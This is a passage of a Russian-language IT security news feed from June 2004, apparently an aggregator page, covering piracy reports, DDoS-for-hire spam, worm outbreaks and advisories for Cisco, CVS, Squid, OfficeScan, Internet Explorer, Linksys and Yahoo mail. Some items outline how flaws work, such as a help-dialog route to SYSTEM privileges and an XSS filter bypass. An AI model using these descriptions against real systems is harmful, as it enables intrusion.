оборудованием, которому необходим высокоскоростной обмен данными между ПК и удаленным устройством, или для поддержки одновременно нескольких каналов соединения.
CNews.ru

11/06/2004 09:16 Китай и Россия признаны самыми пиратскими странами
На днях представители американской звукозаписывающей и кинематографической индустрии доложили Конгрессу США о ситуации с пиратским распространением фильмов и музыкальных записей, сообщает "Компьюлента". В докладе на слушаниях были представлены списки стран, в которых пиратство имеет наиболее широкий размах. Проблема пиратства существует везде, в том числе и в США, однако наибольшее распространение она имеет в странах с переходной экономикой. Американские кино- и звукозаписывающие компании уверены, что из-за пиратов они теряют десятки миллиардов долларов ежегодно, сообщает агентство France-Presse. Среди стран, особенно преуспевших в видеопиратстве, президент Американской ассоциации кинокомпаний (MPAA) Джек Валенти особняком выделил Россию и Китай. В этих странах немало проблем с пиратством, и их количество только растет. По словам Валенти, в деятельности пиратов в этих странах активно участвую организованные преступные группировки. А в Китае власти часто запрещают официальное распространение фильмов, что создает благодатную почву для пиратов. Валенти отметил также, что в период с 1998 по 2002 гг. доходы американских кинокомпаний на рынке КНР сократились с 1,9 млн. до 500 тысяч долларов США. Помимо России и Китая, велика доля пиратской видеопродукции в Бразилии, Пакистане, Малайзии, Таиланде и на Тайване.
Подробности

11/06/2004 09:10 Появилась новая бета WindowsUpdate
Посетитель под ником Roman сообщил нам о доступности новой версии WindowsUpdate. Для того, чтобы получить её, надо стать бета-тестером. Также появились слухи о скором выходе нового SUS-сервера (SUS2), возможности которого уже давно обсуждаются в конференциях Microsoft,и которого давно уже все ждут.
Бета WindowsUpdate

11/06/2004 08:01 Виртуальный киллер принимает заказы на сайты
Российские хакеры предлагают новую услугу: за определенную плату надежно "завесить" веб-сайт конкурента. Спам с таким предложением пришел на электронный адрес газеты "Ведомости". В прайс-листе на услуги значится, что вывод из строя сайта на шесть часов обойдется в $60, а на сутки - $150 (наверное, оптовая скидка). Для этого компьютерные преступники используют давно известную технологию DDoS-атак (Distributed Denial of Service - на русский это переводится как "распределенная атака, приводящая к отказу в доступе"). Взломав каким-либо способом несколько тысяч чужих компьютеров, хакер заставляет их одновременно слать бессмысленные запросы на сайт, который нужно "уронить". Как бы хорошо ни была организована его защита, в определенный момент система безопасности перестает справляться с огромным трафиком и в итоге отказывает в доступе всем без разбора. А заставить работать на себя машины ни в чем не повинных честных граждан можно, например, с помощью вирусов, которые в последнее время плодятся быстрее, чем кошки в известной поговорке. Кому выгодно зависание сайта, понятно: если, скажем, клиент банка полдня безуспешно пытается оформить транзакцию через Сеть, у него обязательно родится мысль вложить свои деньги в какое-нибудь другое финансовое учреждение. Так что недоброжелатели могут иметь от такой аварии немалую выгоду. Ради любопытства корреспондент "Ведомостей" вошел в контакт с хакером, который прислал письмо, и поинтересовался, в какую сумму обойдется "устранение", например, microsoft.com и kremlin.ru. По мнению таинственного киберпреступника, который пользовался именем DoZ, свалить детище Билла Гейтса можно запросто, но потом обязательно поймают, и запросил за эту услугу $80 тысяч. Почему-то сервер президента РФ злоумышленник оценил намного дешевле - всего $2 тыс.: видимо, наши компетентные органы еще не научились бороться с хакерами так же эффективно, как заграничные коллеги. Однако в милиции полагают, что наикрутейший взломщик DoZ является на самом деле обычным мошенником. Он вовсе не собирается ломать сайт Microsoft, а только вымогает деньги у доверчивых простаков. Сняв гонорар с электронного счета, преступник легко может скрыться. М-да... Журналисты, как всегда на "высоте" (прим. ньюсмейкера).
"Утро"

10/06/2004 17:08 Выход SP2 для MS ISA Server 2000
Как-то тихо, без положенного в таких случаях рекламного шума, M$ выпустила Service Pack 2 для (надо отдать должное) довольно неплохого ПО, предназначенного для выполнения задач файрволлинга и проксирования (простите за подобные обороты), под названием ISA (Internet Security and Acceleration) Server 2000. Как написано в кратком анонсе, исправлены различные баги, устранены обнаруженные проблемы безопасности, проведена работа по улучшению стабильности работы под ОС серии 2003 (различных версий). Может ставится, как поверх установленного SP1, так и самостоятельно. Размер довольно небольшой ~3.9 MB.
Подробности

10/06/2004 16:44 Уязвимость в Catalyst CISCO
Компанией CISCO выпущен бюллетень по безопасности, в котором констатируется факт наличия уязвимости в ОС CatOS, которой оснащены "железки" от CISCO серии Catalyst (указывается на наличие уязвимости в моделях 6ххх, 5ххх, 45хх, 4ххх серий). Уязвимости подвержены только те типы оборудования, в которых запущены сервисы Telnet, HTTP и SSH. При проведении атаки, которую компания назвала TCP-ACK Denial of Service (DoS) возможно возникновение ситуаций, приводящих к спонтанным перезагрузкам оборудования. Суть атаки сводится к тому, что на этапы проведения процедуры "тройного рукопожатия" (3-way handshake) при установлении TCP-сессии, вместо традиционного пакета ACK, переводящего сеанс в состояние ESTABLISHED, посылается некорректный пакет, переводящий соединение в некорректное состояние. IOS, выпускаемая также CISCO уязвимости не подвержена. Обновления для всех версий CatOS выпущены.
Бюллетень от CISCO

10/06/2004 16:25 Порция уязвимостей в CVS
Если вы помните, мы сообщали ранее о взломе сайта cvshome.org. Прии анализе инцидента ряд специалистов по безопасности, среди которых - Sebastian Krahmer из SuSE, Stefan Esser из немецкой e-matters GmbH, Derek Robert Price подвергли весь код исходников сервера глубокому анализу, который привёл их неутешительным выводам. В исходном коде системы отслеживания изменения версий CVS обнаружен целый ряд ошибок. В частности, в своём сообщении Стефан сообщает о 6-ти подобных уязвимостях в разных программах проекта. Уязвимости довольно критичные - некоторые приводят к краху системы, некоторые к возможностям выполнения исходного кода на CVS-сервере с привилегиями пользователя, от имени которого запускается CVS-сервер. Уязвимости подвержены версии - CVS feature release <= 1.12.8 и стабильные релизы версии <= 1.11.16. Администраторам серверов настоятельно рекомендуют срочно обновиться до вновь выпущенной версии.
Подробности

10/06/2004 15:05 Национальным доменом .ua будут управлять «люди в штатском»
Домен .ua взят под контроль госструктурами Украины. Двухлетняя борьба за право администрирования домена завершилась вчера решением Высшего хозяйственного суда, который отклонил кассационную жалобу старого администратора, ООО «Хостмастер», на решение Апелляционного хозяйственного суда, принятое 3 февраля 2004 года. Это означает, что передача домена .ua под контроль организации UANIC, за которой стоят украинские спецслужбы, считается правомерной. Борис Мостовой, директор компании «Хостмастер», рассчитывал на признание Высшим хозсудом нарушений норм материального и процессуального права, допущенных в ходе заседания Апелляционного хозсуда. В таком случае, дело могло вернуться на рассмотрение в первую инстанцию, Киевский хозяйственный суд. Именно здесь 7 ноября 2003 года была впервые подтверждена законность распоряжения правительства Украины № 447 «Об администрировании домена .ua». Опасения экспертов по поводу того, что на Украине теперь может быть создана система глобального мониторинга трафика, похоже, оправдываются. В марте на рассмотрение Верховной Рады был внесен законопроект «О мониторинге телекоммуникаций», который уже получил негативную оценку Комитета по евроинтеграции как несоответствующий нормативным актам Европейского Союза и Совета Европы в области защиты прав человека.
"Вебпланета"

10/06/2004 14:19 SCO запрещает Sun открывать код Solaris
Вполне вероятно, компания Sun не сможет открыть исходный код своей флагманской операционной системы Solaris по лицензии GPL. По крайней мере, так утверждают представители SCO. По заверениям SCO, даже если Sun и выпустит открытый вариант своей ОС, то уж точно не по GPL. Сделать это не удастся, в первую очередь, из-за лицензионных ограничений, Дело в том, что Solaris основана на исходном коде Unix System V, а копирайт на этот код якобы принадлежит SCO. Как сообщает ComputerWorld со ссылкой на заявление менеджера SCO по маркетингу Марка Модерсицки, Sun, безусловно, имеет намного больше прав, нежели любой другой лицензиат Unix, но и она, тем не менее, не должна выходить за дозволенные рамки. А рамки эти не позволяют открыть Solaris в соответствии с GPL. Впрочем, Sun и сама ранее говорила о том, что открытая версия Solaris будет выпущена не по GPL, а по какой-либо другой лицензии, что позволит избежать появления многочисленных не вполне совместимых вариантов ОС.
"Компьюлента"

10/06/2004 13:41 Уязвимость в Trend OfficeScan
Обнаружена уявзвимость в корпоративном антивирусном пакете Trend OfficeScan. При проверке файлов на вирус и обнаружении его показывается окно "OfficeScan Client" с информациейй относительно обнаруженного вируса. Это окно запускается от имени сервиса "OfficeScanNT RealTime Scan" (ntrtscan.exe). При выборе (при помощи мышки) помощи (help) запускается приложение winhlp32.exe с привилегиями вышеназванного сервиса, который, в свою очередь, запускается c привилегиями SYSTEM. Таким образом, используя последовательность file+open в окне приложения помощии можно запустить произвольный файл с привилегиями SYSTEM. Патч от производителя доступен. Уязвимость обнаружена в версии 5.5 на ОС WinXP + SP1.
Патч

10/06/2004 13:23 Уязвимость в SQUID
Известная секьюрити компания iDEFENSE сообщает о наличии уязвимости в популярном кеширующем прокси-сервере SQUID, позволяющей удалённо выполнить произвольный код в системе с привилегиями пользователя squid. Для проверки пользователей при подключении к серверу используются 3 схемы аутентификации: Basic, Digest и NTLM. Уязвимость обнаружена в функции аутентификации ntlm_check_auth(), расположенной в программе helpers/ntlm_auth/SMB/libntlmssp.c. Из-за некорректной обработки граничных условий в переменной 'pass' может возникнуть ситуация переполнения буфера в системном вызове memcpy(). Производителем выпущен патч для устранения уязвимости.
Описание

10/06/2004 12:45 Комплексное обновление для Mac OS X.
Компания Apple извещает своих пользователей о выпуске комплексного обновления для семейства ОС Mac OS X - SA-2004-06-07. Обновления выпущены для - v10.3.4 "Panther" (в т.ч. Server), v10.2.8 "Jaguar" (в т.ч. Server). Затронуты довольно многие компоненты этих ОС: LaunchServices, DiskImageMounter, Safari, Terminal. Все обновления устраняют дыры в безопасности, о которых ранее неоднократно упоминалось различными специалистами по компьютерной безопасности. Всем пользователям, разумееется, настоятельно рекомендуют обновиться.
Подробности

10/06/2004 12:12 Червь Korgo: опасный эксперимент?
Возможно, создатель Korgo пытается создать новые версии, чтобы застать пользователей врасплох и вызвать серьезную эпидемию. Вначале Korgo.A приняли за новую версию знаменитого Sasser. Однако тот факт, что появилось 12 версий, достигших быстрого успеха, указал на более зловещие причины, которые представляют серьезную угрозу целостности информационных систем. Как и Sasser, черви семейства Korgo используют для распространения брешь LSASS, что позволило им быстро охватить весь Интернет. Но в отличие от Sasser, эти вирусы стараются остаться незамеченными при заражении компьютера, поэтому пользователи не наблюдают никаких признаков инфицирования, таких как продолжающиеся перезагрузки пораженного компьютера. Также эти черви могут, в зависимости от версии, удалять определенные файлы, открывать коммуникационные порты и пытаться соединиться с разными серверами IRC. Другая важная характеристика – это то, что некоторые из этих вирусов используют mutex – взаимное исключение объектов. Эти объекты могут контролировать доступ к ресурсам системы и предотвращать одновременное использование одного и того же ресурса в более чем одном процессе. Один из таких mutex, созданных этим вредоносным кодом, назвали “utermXX” (где XX – случайно выбранный номер). Так, в то время как Korgo.C использует mutex “utwrm7”, Korgo.J использует “uterm12”. Это предполагается в том случае, если существует, по крайней мере, 12 версий червя (в этом случае версия – это вирус, обладающий существенно другими характеристиками, чем его предшественники). Кроме того, есть и другие меньшие версии, частично отличающиеся от оригинального кода. Это пример случая с червями Korgo.K и Korgo.L, созданными с минимальными отличиями от оригинального кода. Эти вредоносные коды также изменяют системный реестр Windows, причем каждый новый вариант удаляет изменения, созданные его предшественниками, вызывая, в свою очередь, новые изменения. Это означает, что порядок, в котором они были созданы, можно проследить по изменениям, которые они вызвали. Например, то, что Korgo.D удаляет записи, созданные Korgo.F, предполагает, что Korgo.D – более ранняя версия.
Panda Software

10/06/2004 10:22 Ошибки IE используются для распространения pop-up тулбара
Поставщик онлайновой рекламы, похоже, использует два ранее неизвестных пробела в защите браузера Microsoft Internet Explorer для установки на атакуемые компьютеры инструментальной панели, демонстрирующей всплывающие окна, сообщает ZDNet. Один дефект позволяет атакующему исполнять собственную программу на машине жертвы, а другой — наделять ее повышенными привилегиями (cross zones). В результате можно создать веб-сайт, который загружает и устанавливает программы на машинах посетителей. Microsoft узнала о проблеме в понедельник, когда специалист по компьютерной безопасности распространил ее анализ через список почтовой рассылки Full Disclosure. Софтверный гигант уже обратился в ФБР. Компания намерена как можно быстрее выпустить поправку, не дожидаясь обычного ежемесячного обновления. Судя по описанию на веб-сайте антивирусной компании Symantec, ошибки использовались для установки поисковой панели I-Lookup, которая добавляет в IE другие инструменты adware. Программа подменяет домашнюю страницу Internet Explorer, соединяется с одним из шести рекламных веб-сайтов и часто отображает всплывающие окна — главным образом с порнографической рекламой. Во вторник информационная группа Secunia выпустила рекомендации по данной проблеме, оценив обе ошибки как «крайне критические». «Secunia подтверждает наличие уязвимостей в полностью пропатченной системе с Internet Explorer 6.0, — пишет группа. — Сообщалось, что предварительная версия SP2 предотвращает их использование, блокируя доступ». Ошибки позволяют атакующему, создавшему веб-сайт, рассылать e-mail или IM-сообщения со ссылками, кликнув на которых, пользователь Internet Explorer вызывает исполнение злонамеренной программы на своем компьютере.
Рекомендации от Secunia

10/06/2004 09:58 Защита ПО: от слов к делу
Москва, 09 июня 2004 г. – На вопрос «Как долго будет процветать пиратство?» представители компаний Rainbow-SafeNet (США), Novell и НП ППП (Некоммерческого Партнерства Поставщиков Программных Продуктов) на семинаре «Защити своё» конкретный ответ, конечно же, не дали – их задача была иной. Согласно отчётам Business Software Alliance (BSA) – организации, защищающей интересы разработчиков ПО, соотношение использования пиратского и лицензионного программного обеспечения в России в 2003 году, составляло 89% и 11% соответственно. По сравнению с 2002 годом эти показатели увеличились на 2%. В условиях широко распространённого пиратства необходимо было, прежде всего, показать разработчикам возможности и методы защиты ПО от нелицензионного использования и дать чёткие рекомендации по применению законодательных, программных и аппаратных средств. Именно за этой информацией и пришли 8 июня специалисты более 80 компаний-производителей ПО на специализированный семинар для разработчиков, организованный компанией Rainbow Technologies. Том Ибарра, менеджер по продуктам Rainbow-SafeNet, в своей презентации подчеркнул, что после слияния SafeNet сфокусировалась не только на поддержке, но и на развитии технологии Sentinel. Он сообщил о том, что уже в третьем квартале этого года на рынке появится новая модель электронного ключа - Sentinel UltraPro, предоставляющего разработчикам ещё больше возможностей для обеспечения защиты их интеллектуальной собственности. Кроме того, готовится к выпуску программно-аппаратный комплекс Sentinel RMS, который позволяет пользователям распространять цифровую информацию и определять как и при каких обстоятельствах она может быть использована. Например, автор может указать сроки доступа к документу и тех, кто может открывать, изменять, печатать и пересылать его. По итогам семинара слушатели в качестве одного из наиболее эффективных средств защиты ПО от пиратства выделили уже известную на рынке технологию Rainbow Technologies – Sentinel, реализованную в электронных ключах Sentinel и программном комплексе управления лицензированием ПО - SentinelLM. Спасибо Ирине Зеренковой за сообщение.
О семинаре

9/06/2004 14:17 В Мичигане осужден взломщик беспроводных сетей
На прошлой неделе мичиганец Брайан Салседо был признан виновным во взломе беспроводной сети магазина Lowe's. Салседо обвиняется по статье уголовного кодекса, предусматривающей наказание за мошенничество с использованием телекоммуникаций. Максимальный срок наказания по этому закону (с учетом того, что вина Брайана была доказана в четырех случаях взлома) составляет 18 лет тюремного заключения. На преступника налагается также штраф в размере до 2,5 миллиона долларов США. Однако Салседо удастся избежать столь строгого наказания, так как прокуратура намерена потребовать смягчения приговора. Перемена в отношении государственного обвинения к преступнику произошла благодаря активному сотрудничеству Брайана со следствием. Взлом сети Lowe's произошел в октябре-ноябре 2003 года, когда Салседо вместе с двумя сообщниками обнаружил уязвимую беспроводную сеть в магазине. Уязвимость использовалась для доступа ко всей корпоративной сети Lowe's. Хакеры пытались установить измененную версию программы для обработки запросов о снятии средств с кредитной карты tcpcredit с целью кражи номеров кредиток. Приговор по делу троих хакеров будет вынесен в конце июня, сообщает PC World.
"Компьюлента"

9/06/2004 13:39 В OpenBSD больше не будет обновления Apache
Поставляемому в комплекте OpenBSD web-серверу Apache суждено застыть на отметке 1.3.29 (будут только накладываться патчи имеющие отношение к безопасности), так как версия 1.3.31 была выпущена под новой лицензией (v. 2.0) с которой разработчики OpenBSD не согласны, сообщает сайт opennet.ru. Из положительных новостей можно отметить помещение в OpenBSD кода для поддержки маршрутизации от источника (Source Routing), при которой начальный узел включает в отправляемый пакет полное описание пути следования пакета.
Подробности

9/06/2004 12:49 Хостинг-провайдер «Арбатек» борется с группировкой «Хамас»
07 июня 2004. Российский хостинг-провайдер «Арбатек» прекратил обслуживание целого ряда веб-сайтов, имеющих прямое отношение к палестинской террористической организации «Хамас», сообщает Вебпланета. Специалисты компании «Арбатек» обратили внимание на некоторые детали, свидетельствующие о прямом отношении данных ресурсов к террористической организации. После предварительных консультаций с представителями управления «К» МВД России, было принято совместное решение о прекращении обслуживания веб-сайтов, имеющих прямое отношение к террористической организации «Хамас». Как сообщил Константин Листратов, директор по маркетингу и связям с общественностью компании «Арбатек», «решение о прекращении обслуживания было принято в отношении 5 сайтов. Сайты содержали контрпропагандистские материалы, а также информацию о спецслужбах Израиля. Вся информация была на русском языке и предназначалась для русскоязычного пользователя». Согласно договорным условиям, «Арбатек» не контролирует информацию, размещаемую на серверах клиентов компании и не несет ответственности за информационное содержание сайта. Администрирование и контроль ресурсов осуществляется клиентами самостоятельно. Именно поэтому в заключаемом с клиентом договоре отдельно оговаривается, что всю ответственность за размещаемую на сервере информацию клиент несет индивидуально. Согласно договору, клиенту запрещается размещать информацию, противоречащую законодательству РФ. Основная проблема заключается в несовершенстве российской законодательной базы и правовых механизмов в этой области, которые четко позволяли бы классифицировать информацию, представленную на данных ресурсах как незаконную, а также определять виновных и привлекать их к ответственности. По словам руководства компании «Арбатек» – подобное решение является проявлением гражданской позиции компании, добровольной актом, который находится в русле общественных и государственных инициатив в области недопущения распространения незаконной информации в российском интернет-пространстве. Несколько месяцев назад сайт группировки «Хамас» был обнаружен на мощностях хостинг-провайдера «Караван». Ресурс был незамедлительно удален провайдером, как только был обнаружен.
crime-research.ru

9/06/2004 12:25 Хакеры напали на сайт филиппинского правительства
Группа хакеров попыталась вывести из строя официальный сайт правительства страны в период проведения выборов, состоявших 10 мая. Об этом источник в филиппинском правительстве сообщил сайту INQ7 в конце прошедшей недели. «За несколько недель до выборов были зафиксированы попытки атак на сайт gov.ph. Большинство из них составили так называемые DoS-атаки», - сообщил советник президента Филиппин Тим Диас Ривера. Факты атак на gov.ph подтвердил и глава интернет-провайдера Bitstop Вилсон Чуа, предоставляющего услуги филиппинскому правительству. При этом Чуа подчеркнул, что его сотрудники были в состоянии нейтрализовать атаки, произошедшие с 7 по 12 мая. «Нам удалось выяснить, что атаки были организованы из города Цебу», - рассказал Ривера и добавил, что часть нападений была совершена из Бразилии. Советник президента Филиппин допускает, что для организации DoS-атаки использовались зараженные машины обычных пользователей. Правительство уже передало часть необходимых сведений об атаке хакеров следственным органам. Пока не установлено, имеют ли отношение хакерские атаки к выборам на Филиппинах.
Источник

9/06/2004 11:57 Microsoft залатала очередные дыры в своих продуктах
Корпорация Microsoft выпустила новые бюллетени безопасности, описывающие дыры в программных интерфейсах DirectХ, а также модулях генерации отчетов Crystal Reports и Crystal Enterprise разработки фирмы Business Objects. Первая уязвимость связана с компонентом IDirectPlay4, отвечающим за поддержку многопользовательских сетевых игр. Для реализации атаки злоумышленнику необходимо направить компьютеру-жертве составленный определенным образом пакет данных. При обработке такого запроса приложением, использующим IDirectPlay4, возникает сбой, и хакер получает возможность провести DoS-атаку. Уязвимость содержится практически во всех версиях DirectХ, тем не менее, софтверный гигант присвоил ошибке рейтинг умеренной опасности. Патчи выпущены для операционных систем Windows 2000, ХР (32- и 64-битные версии) и Server 2003 (32- и 64-битные версии). Второй бюллетень безопасности, MS04-017, как уже отмечалось, закрывает дыры в модулях автоматической генерации отчетов Crystal Reports и Crystal Enterprise, входящих в состав Visual Studio.NET, Outlook 2003 (с установленным Business Contact Manager) и Microsoft Business Solutions CRM 1.2. В случае удачного проведения атаки злоумышленник через веб-интерфейс Crystal Reports или Crystal Enterprise может просматривать и удалять файлы, хранящиеся на жестком диске уязвимой машины. Опасность ошибки также охарактеризована как умеренная.
MS04-016
MS04-017

9/06/2004 11:13 ЕС: законы против спама не работают
Отсутствие взаимодействия между борцами со спамом не позволяет эффективно бороться с теми, кто рассылает нежелательные рекламные письма, считает представитель ЕС Филип Жерар. На встрече борцов со спамом в Лондоне он заявил, что теперь все участники антиспамовского фронта должны сами выработать единую стратегию борьбы, так как законодательные органы ЕС уже сделали все возможное - законы позволяют преследовать спамеров, сообщает BBC News. "Мы наблюдаем ситуацию, когда совершенно разные инициативы направлены в разные стороны, а это неэффективно", - заявил Жерар. По его словам, законы Европейского союза и отдельных членов ЕС - это далеко не все, что можно противопоставить спамерам, тем более, что соответствующие законодательные акты не могут работать без поддержки со стороны европейского бизнес-сообщества. Необходимо постепенно делать спам постыдным занятием для любой приличной фирмы, включая в контракты положения, не допускающие массовую рассылку рекламных писем, считает чиновник. Кроме того, Жерар отметил, что некоторые фильтры не пропускают к подписчикам электронные письма, содержащие вполне законные и заказанные рекламные сообщения, и с этим тоже надо бороться.
Lenta.ru

9/06/2004 10:50 Microsoft и SAP замышляли слияние
В конце прошлого года Microsoft и SAP начали переговоры о слиянии, но несколько месяцев назад прервали их из-за чрезвычайной сложности. Так говорится в заявлениях, опубликованных в понедельник двумя софтверными компаниями. Информация, относящаяся к переговорам о слиянии, будет фигурировать на судебном процессе Oracle-PeopleSoft, который начался в понедельник. Oracle инициировала враждебное поглощение конкурирующей PeopleSoft в прошлом году, но этому препятствует Министерство юстиции США. Информация, относящаяся к переговорам о слиянии, всплыла в процессе предварительного расследования. SAP говорит, что в конце прошлого года Microsoft обратилась к компании с предложением обсудить идею слияния. «Несколько месяцев назад Microsoft прекратила переговоры из-за сложности процедуры и последующей интеграции. У нас нет намерений возобновлять эти переговоры», — говорится в заявлении Microsoft. Планы Microsoft в отношении рынка бизнес-ПО будут играть ключевую роль в деле Oracle. В список свидетелей Минюста могут войти несколько топ-менеджеров Microsoft, включая старшего вице-президента отделения бизнес-решений Дугласа Бергама. Слияние Microsoft и SAP подтвердило бы аргумент Oracle, что правительство недооценивает угрозу конкуренции со стороны как мелких игроков, так и новых участников рынка вроде Microsoft. По некоторым сведениям, софтверный гигант сделал для Министерства юстиции заявление под присягой, в котором говорится, что у него нет планов выхода на этот рынок в ближайшие два года.
Подробности

8/06/2004 11:21 Антивирусные эксперты комментируют эпидемию червей Padobot/Korgo
Производители антивирусного программного обеспечения предупреждают пользователей операционных систем Windows 2000 и Windows XP о появлении новой версии червя Worm.Win32.Padobot, известного также как Korgo. Последняя модификация программы получила версию "e" (W32.Korgo.f по классификации Symantec). Червь Padobot эксплуатирует уязвимость в службе LSASS Windows, описанную в информационном бюллетене Microsoft от 13 апреля этого года. Этот же изъян использовали создатели вредоносных программ Sasser, Dabber и Cycle. «Все, чьи компьютеры заражены Korgo, скорее всего, проспали Sasser, Dabber и Cycle. Любая компания, серьезно относящаяся к своей безопасности, установила соответствующую заплатку и привела в порядок свои межсетевые экраны несколько недель назад. Им не стоит опасаться нового появления Korgo», - заявил представитель производителя антивирусного программного обеспечения Sophos. По словам представителя компании Symantec, в Padobot.e включена бэкдор-утилита, которая делает зараженные системы открытыми для несанкционированного внешнего доступа. «Эта утилита может привести к потере конфиденциальных данных и сбить многие настройки системы безопасности», - пояснили в Symantec. Учитывая увеличение числа заражений червем Padobot, специалисты по информационной безопасности повысили рейтинг исходящей от него угрозы. Padobot.e способен проникать на компьютеры через TCP-порты 113 и 3067. Рост трафика через эти порты может свидетельствовать о проникновении червя в машину. Иного мнения о продолжающейся эпидемии червей семейства Padobot придерживаются в «Лаборатории Касперского». «По нашему мнению, проблема Padobot несколько преувеличена. Согласно нашим оценкам, подтвержденным наблюдением за IRC-каналами, к которым обращаются все зараженные Padobot компьютеры, общее число инфицированных систем не превышает нескольких тысяч, что значительно меньше, чем сотни тысяч и даже миллионы машин, зараженных в ходе эпидемий червей Mydoom, NetSky, Bagle или Sasser», - отметил вирусный аналитик «Лаборатории Касперского» Александр Гостев. Кроме того, в качестве наиболее вероятного места создания червей семейства Padobot в «Лаборатории Касперского» называют Россию. На это косвенно указывают имена используемых червями IRC-каналов, а также ряд других особенностей, весьма схожих с примененными в другой вредоносной программе - Backdoor.Padodor, авторство которой принадлежит русской вирусописательской группе HangUp Team.
"Лаборатория Касперского"

8/06/2004 10:51 Microsoft раздает бесплатные лицензии на серверное ПО
Компания Microsoft внесла новые изменения в схему лицензирования своих серверных продуктов по программе Software Assurance. Напомним, что в рамках этой программы плата взимается на подписной основе, то есть клиенты платят за каждый год использования продуктов. Microsoft, со своей стороны, обеспечивает в этот период полную техническую поддержку, максимально оперативно и, к тому же, без дополнительной платы поставляет обновления и дополнения к своим продуктам. С начала июня клиентам, работающим по схеме Software Assurance предоставляются новые возможности. В частности, Microsoft разрешила бесплатную установку продуктов семейства Windows Server на резервные серверы, используемые только в экстренных ситуациях, например, для восстановления данных. Таким образом, компаниям, имеющим редко используемые резервные серверы, больше не нужно платить за лицензии на программное обеспечение на таких машинах. Кроме этого, с 1 июня Microsoft продлила сроки технической поддержки продуктов, поставляемых для бизнеса и разработчиков программных продуктов. В общей сложности, срок увеличился до десяти лет: по пять лет всеобъемлющей (mainstream support) и расширенной (extended support) поддержки. Ранее эти периоды составляли, соответственно, три и пять лет.
"Компьюлента"

7/06/2004 18:49 В июне Intel прольет процессорный дождь
Intel уже составила планы на летние каникулы. В конце текущего месяца компания выпустит ряд новых процессоров: как для высокопроизводительных настольных ПК, так и для тех, которые больше ориентированы на развлечения. Компания начнет производить чипсеты Intel 915 Express и Intel 925 Express и девять новых процессоров Pentium 4 и Celeron. Ожидается, что ПК с чипсетами серии 900 и новыми Pentium 4 поступят в продажу после 19 июня. А еще через несколько дней последуют ПК Celeron. Новые чипсеты и процессоры, в число которых, как утверждают источники, войдет Pentium 4 560 с тактовой частотой 3,6 ГГц, означают появление разнообразных моделей ПК с более высокой производительностью и некоторыми новыми возможностями, включая встроенный узел беспроводного доступа, т. н. Intel Wireless Connect Technology. Сначала появятся ПК традиционной конструкции, такие как настольные башни, предназначенные для решения общих вычислительных задач или игр. Однако одновременно с официальным выпуском новых чипсетов, который планируется на 21 июня, или вскоре после него такие производители, как Dell, Gateway и Hewlett-Packard, анонсируют настольные системы новой конструкции. Они дадут начало рынку top-end ПК стоимостью от $1200. Чипсеты серии 900, включая версии 915P и 925X для игровых ПК, содержат ряд новых особенностей, нацеленных на повышение производительности настольных систем.
Более подробно

7/06/2004 18:16 Российских хакеров обвинили в создании вируса Korgo
Финская антивирусная компания F-Secure обвинила российских хакеров с создании компьютерного вируса Korgo (Padobot), который крадет банковскую информацию и личные данные владельцев кредитных карточек во время покупок и заказов через Интернет. Как говорится на сайте F-Secure, вирус создала российская хакерская группа Hangup Team. Korgo распространяется аналогично вирусу Sasser, эпидемия которого прошла в начале мая. При заражении Korgo устанавливает на компьютер специальную программу, которая записывает все данные, вводимые с клавиатуры. Сотрудники F-Secure сообщили, что уже существует несколько разновидностей вируса. Специалисты по безопасности не считают, что Korgo представляет большую угрозу. Как сообщили в антивирусной компании Sophos, все пользователи, серьезно относящиеся к своей безопасности, уже установили "заплатки" против Sasser и таким образом обезопасили себя от Korgo. Представитель "Лаборатории Касперского" заявил газете "Ведомости", что опасность Korgo преувеличена: вирус существует уже больше недели, однако его эпидемия так и не началась. Российская группа HangupTeam уже давно известна специалистам по компьютерной безопасности. "Лаборатория Касперского" не исключает, что именно эта команда хакеров создала вирус MyDoom. На сайте HangupTeam говорится, что в прошлом году ее клиенты разослали более 50 миллионов писем со спамом, инфицировали полтора миллиона компьютеров и похитили файлы с паролями общим объемом около пяти гигабайт.
lenta.ru

6/06/2004 14:08 В беспроводном маршрутизаторе Linksys обнаружена уязвимость
Популярный беспроводной машрутизатор Linksys WRT54G при определенных условиях может допустить злоумышленника в меню администрирования, утверждает независимый исследователь Элан Рейтлифф (Alan W.Rateliff II). Ему удалось установить, что веб-интерфейс допускает к меню администрирования по 80 и 443 портам всех, если пользователь отключил эту возможность. Пароль и имя пользователя в таком случае установлены по умолчанию, что-то наподобие admin/admin. Если функция включена и пароль установлен, то вторжение невозможно. Заплатку пока не написали, несмотря на обращение исследователя в Linksys, подразделение Cisco. Последняя версия ПО маршрутизатора по-прежнему датирована 17 марта. Рэйтлифф советует решить проблему просто - или выбрать сложный пароль, или, при отключенной функции, перенаправить порты 80 и 443 на несуществующий адрес.
CNews

6/06/2004 13:39 Выход Opera 7.51
Норвежская компания Opera Software выпустила обновленную версию своего «самого быстрого в мире браузера», сообщает "Компьюлента". Новая версия с индексом 7.51 незначительно отличается от выпущенной в мае версии 7.50, которая стала наиболее значительным обновлением Opera с момента выпуска версии 7.0 в начале 2003 года. Основное отличие Opera 7.51 от версии 7.50 связано с исправлением дыры, обнаруженной компанией GreyMagic. Из-за того, что браузер не контролирует размеры иконки сайта, отображаемой в адресной строке, стало возможно заменить настоящий URL страницы поддельным. Для этого нужно просто изготовить иконку, на которой будет записан адрес, который мошенники хотят выдать за настоящий. Эта иконка перекроет собой текст в адресной строке, и пользователь будет уверен, что находится на совсем другом сайте. Используя эту дыру мошенники, притворяясь заслуживающими доверия организациями, могут выведать у пользователя конфиденциальные персональные данные или деньги. Помимо ликвидации дыры, которая имелась во всех версиях Opera седьмого поколения до 7.50 включительно, в обновленном варианте браузера немного повышена стабильность работы, исправлены мелкие ошибки в отображении посещенных ссылок и в почтовом клиенте.
Download

6/06/2004 12:39 Уязвимость в почтовой системе Yahoo!
GreyMagic Software сообщает о существовании уязвимости в популярной Вэб-ориентированной почтовой системе Yahoo! Несмотря на встроенный фильтр проверки входящий сообщений на предмет наличия потенциально опасныйх HTML-кодов было обнаружено, что уязвимость типа Cross-Site Scripting всё-таки существует (вернее, существовала). Система фильтрации довольно успешно фильтрует псевдосимволы (& # xxx; вида) для того, чтобы не допустить попадания тегов <java script в почтовое сообщение, однако было обнаружено, что фильтрация символа пробела (& # 000013) c многими нулями не производится и, таким образом всё-таки остаётся возможность передать в теле письма Джаваскрипт. Последствия вполне очевидны: кража паролей, доступ к содержимому почтового ящика, получение coockies. Службе сервиса Yahoo! было сообщено об уязвимости 20 мая и уязвимость была устранена 24 мая.
Описание

6/06/2004 12:13 Разработчики крадут код?
